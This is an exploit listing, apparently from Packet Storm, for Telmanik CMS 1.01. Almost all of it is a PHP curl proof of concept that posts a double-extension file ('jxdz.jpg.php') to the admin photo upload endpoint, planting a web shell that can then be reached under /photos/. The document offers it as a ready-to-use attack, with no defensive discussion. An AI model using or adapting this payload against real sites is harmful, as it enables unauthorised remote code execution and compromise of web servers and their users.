Telmanik CMS 1.01 Shell Upload

2013-12-13T00:00:00
ID PACKETSTORM:124423
Type packetstorm
Reporter JoKeR_StEx
Modified 2013-12-13T00:00:00

Description

                                        
                                            `/*  
##########################################################################  
  
Exploit title : telmanik cms v1.01 File Upload  
  
Date : 12/12/2013  
  
Author : JoKeR_StEx  
  
Software Link : http://www.telmanik.com/open-source.php  
  
Tested On : WinXP PRO SP3  
  
CVE : [~]  
  
Version : 1.01  
  
#########################################################################  
*/  
  
1) File Upload  
  
P.O.C  
  
<?  
  
# <3Algeria<3  
  
$web = "http://127.0.0.1/telmanik/upload/admin/photo_upload.php";  
$dz = curl_init();  
$shell = "jxdz.jpg.php";  
curl_setopt($dz,CURLOPT_URL,$web);  
curl_setopt($dz,CURLOPT_RETURNTRANSFER,true);  
curl_setopt($dz,CURLOPT_HEADER,false);  
curl_setopt($dz,CURLOPT_VERBOSE,false);  
curl_setopt($dz,CURLOPT_POST,true);  
$jxarray = array("image1"=>"@".$shell);  
curl_setopt($dz,CURLOPT_POSTFIELDS,$jxarray);  
$exec=curl_exec($dz);  
$end=curl_close($dz);  
  
?>  
  
//The Shell YOu cAn Find it in /photos/  
  
`